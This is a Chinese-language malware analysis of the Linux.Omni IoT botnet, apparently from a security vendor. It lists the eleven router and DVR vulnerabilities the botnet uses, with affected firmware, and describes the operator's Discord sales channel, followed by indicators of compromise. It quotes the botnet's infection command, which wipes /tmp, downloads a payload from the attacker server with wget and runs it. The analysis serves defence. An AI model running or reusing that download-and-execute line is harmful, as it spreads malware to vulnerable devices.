linux根目录IOT文件,针对新型IoT僵尸网络Linux.Omni的分析

一、概述

长期以来，我们对网络上活动的Linux和IoT威胁进行分类和分析工作。本文将主要介绍针对Linux.Omni僵尸网络进行分析，我们从部署的蜜罐中检测到该恶意软件。之所以这个僵尸网络引起了我们的注意，是因为它的感染库中包含高达11种不同的漏洞。经过分析，我们最终确定该威胁属于IoTReaper的新版本。

二、二进制分析

首先，让我们感到惊讶的第一件事就是该恶意软件的分类，也就是OMNI。近几周来，我们检测到了OWARI、TOKYO、SORA、ECCHI等等，所有这些恶意软件都是Gafgyt和Mirai的分支版本。并且，所有这些恶意软件与之前的分析结果相比，没有任何创新。

因此，分析该恶意软件的感染方式，我们发现如下说明：

如我们所见，这是一个非常常见的脚本，通过另一个僵尸网络感染。

尽管当前，一切证据都表明这个样本是Mirai或Gafgyt的一个常见变种，但我们还是对样本进行了下载和分析。

在分析过程中，我们初步发现二进制文件是使用UPX进行加壳的，这在大多数同类型样本中不是很常见，但在其他一些流行的僵尸网络变种中却并不罕见。

经过查看二进制文件后，我们发现其二进制文件的基本结构与Mirai相匹配。

但是，我们在分析二进制文件中的感染选项时，发现其攻击方式存在不同。除了使用默认凭据进行传播之外，它还利用了已经在IoTReaper、Okiru、Satori等其他僵尸网络中发现的IoT设备漏洞，包括近期发现的影响GPON路由器的漏洞。

接下来，让我们来仔细分析Omni所使用的漏洞。

2.1 Vacron

在“board.cgi”中，使用了VACRON网络视频录像机中代码注入的漏洞，该参数在HTTP请求解析中，并没有得到较好的调试。我们曾发现IoTReaper僵尸网络利用了这一漏洞。

2.2 Netgear – CVE-2016-6277

在Omni中发现的另一个漏洞是CVE-2016-6277，该漏洞是通过对受影响路由器的cgi-bin/目录进行GET请求实现，最终导致远程代码执行。该漏洞影响Netgear如下型号的路由器：R6400、R7000、R7000P、R7500、R7800、R8000、R8500、R9000。

2.3 D-Link – 通过UPnP进行操作系统命令注入

与IoTReaper一样，Omni也利用了D-Link路由器的命令。僵尸网络利用了hedwig.cgi中存在的Cookie溢出漏洞，并通过UPnP接口实现命令注入。

请求如下：

我们可以在二进制文件中查看该漏洞：

受漏洞影响的固件版本如下：

·DIR-300 rev B – 2.14b01

·DIR-600 – 2.16b01

·DIR-645 – 1.04b01

·DIR-845 – 1.01b02

·DIR-865 – 1.05b03

2.4 CCTV-DVR

恶意软件使用的另一个漏洞，影响了70多个不同的厂商。该漏洞与“/language/Swedish”资源相关，最终允许远程执行代码。

可以在这里找到受该漏洞影响的设备列表：

2.5 D-Link – HNAP

该漏洞在2014年被发现，允许绕过CAPTCHA登录认证，同时允许外部攻击者执行远程代码。该漏洞被恶意软件The Moon使用。

该漏洞影响如下固件版本的D-Link路由器：

·DI-524 C1 3.23

·DIR-628 B2 1.20NA 1.22NA

·DIR-655 A1 1.30EA

2.6 TR-069 – SOAP

该漏洞在2016年11月，被Mirai僵尸网络利用，最终导致德国电信被攻陷。

漏洞如下：

二进制文件中相应部分如下：

2.7 华为HG532路由器 – 任意命令执行

华为HG532路由器中存在配置文件错误验证的漏洞，攻击者可以通过修改HTTP请求来利用这一漏洞，最终实现任意命令执行。

2.8 Netgear – Setup.cgi远程代码执行

该漏洞影响Netgear路由器DGN1000 1.1.00.48固件版本，在未经验证的情况下，允许远程执行代码。

2.9 Realtek SDK

多个设备使用了带有miniigd守护程序的Realtel SDK，这些守护程序存在通过UPnP SOAP接口实现的命令注入漏洞。该漏洞与上面提到的华为路由器漏洞一样，已经发现被Okiru、Satori恶意软件利用。

2.10 GPON

最后，我们发现了该僵尸网络利用的最新漏洞，该漏洞在上个月被发现，影响GPON路由器。目前，该漏洞已经在一些针对Linux服务器的IoT僵尸网络和挖矿恶意程序中被利用。

此外，僵尸网络也通过默认凭证的方式实现扩散，这些凭证使用了与0x33不同的密钥进行XOR编码(0x33是该恶意软件家族通常使用的密钥)，其中每个组合都使用不同的密钥。

三、基础设施分析

尽管攻击方式各有不同，但在设备上执行的命令是相同的：cd /tmp;rm -rf *;wget http://%s/{marcaDispositivo};sh /tmp/{marcaDispositivo}

其下载的文件是bash脚本，该脚本会根据受感染设备的体系结构来下载不同的样本。

我们可以看到，这里进行的漏洞利用与我们所分析的样本并不对应。在这里，只会搜索具有潜在受漏洞影响的HTTP接口的设备，并且会检查是否存在默认凭据的问题，从而感染其他设备。感染途径共有两种，一种是使用前面提到的11个漏洞，另一种是针对公开HTTP服务的潜在目标尝试默认凭据登录。

因此，该体系结构与之前我们发现IoTReaper僵尸网络的体系结构非常相似。

四、寻找Omni幕后黑手

通过对二进制文件的深入调查，我们找到了IP地址213.183.53 [.] 120，该IP地址作为样本的下载服务器。尽管没有找到可用的目录列表，但我们在根目录中找到了一个“Discord”平台，该平台通常是游戏玩家观众的文字和语音聊天工具。

由于该平台不需要任何权限或邀请就能进入，我们使用了megahacker名称，进入聊天。

在加入后，我们发现，聊天的主题并非游戏，而是关于销售僵尸网络服务的内容。

在房间内观察了几分钟之后，我们发现在Omni背后的网络犯罪分子名为Scarface。并且，他为他的僵尸网络制作了一些非常酷的广告海报。

此外，该网络犯罪分子还提供僵尸网络的用户支持服务，并且接受潜在消费者提出的需求，正在尝试提升僵尸网络，使其达到60 Gbps的目标。

我们发现，网络犯罪分子非常不专业，Scarface多次展示其使用僵尸网络获得的“成绩”，其中的一些数字非常荒谬。此外，该网络犯罪分子极其警惕，担心每一位进入该聊天室的人都有可能是警察。

最终，我们确定了Linux.Omni恶意软件实际上就是IoTReaper恶意软件的更新版本，二者使用了相同的网络架构格式，并且Linux.Omni使用了Mirai的源代码。

五、Yara规则

六、IoC

·213.183.53[.]120

·21aa9c42b42e95c98e52157fd63f36c289c29a7b7a3824f4f70486236a2985ff

·4cf7e64c3b9c1ad5fa57d0d0bbdeb930defcdf737fda9639955be1e78b06ded6

·6dfd411f2558e533728bfb04dd013049dd765d61e3c774788e3beca404e0fd73

·000b018848e7fd947e87f1d3b8432faccb3418e0029bde7db8abf82c552bbc63

·5ad981aefed712909294af47bce51be12524f4b547a63d7faaa40d3260e73235

·31a2779c91846e37ad88e9803cbad8f8931e3229e88037f1d27437141ecbd164

·528344fd220eff87b7494ca94caed6eae7886d8003ad37154fdb7048029e880b

·cfca058a4d0a29b3da285a5df21b14c360fb3291dff3c941659fe27f3738ba3e

·2b32375864d0849e676536b916465a1fbb754bbdf783421948023467d364fb4c

·700c9b51e6f8750a20fcc7019207112690974dcda687a83626716d8233923c17

·feb362167c9251dd877a0d76d3b42b68fcd334181946523ca808382852f48b7d

·ca6bc4e4c490999f97ee3fd1db41373fc0ba114dce2e88c538998d19a6f694da

·fc4cfc6300e3122ef9bbe6da3634d3b9839e833e4fc2cea8f1498623398af015

·0fd93aeb2af3541daa152d9aff8388c89211b99d46ead1220c539fa178543bca

·02a61e1d80b1f25d161de8821a31cd710987772668ce62c8be6d9afabe932712

·377a49403cef46902e77ff323fcc9a8f74ea041743ccdbff41de3c063367c99a

·812aa39075027b21671e5a628513378c598aef0feb57d0f5d837375c73ade8e8

·c9caccd707504634185ee2a94302e3964fb6747963e7020dffa34de85bd4d2ce

·a159c7b5d2c38071eb11f5e28b26f7d8beaf6f0f19a8c704687f26bfa9958d78

·5eb7801551ee15baec5ef06b0265d0d0cc8488f16763517344bb8456a2831b82

·2f1d0794d24b7b4f164ebce5bdde6fccd57cdbf91ea90ec2f628caf7fd991ce4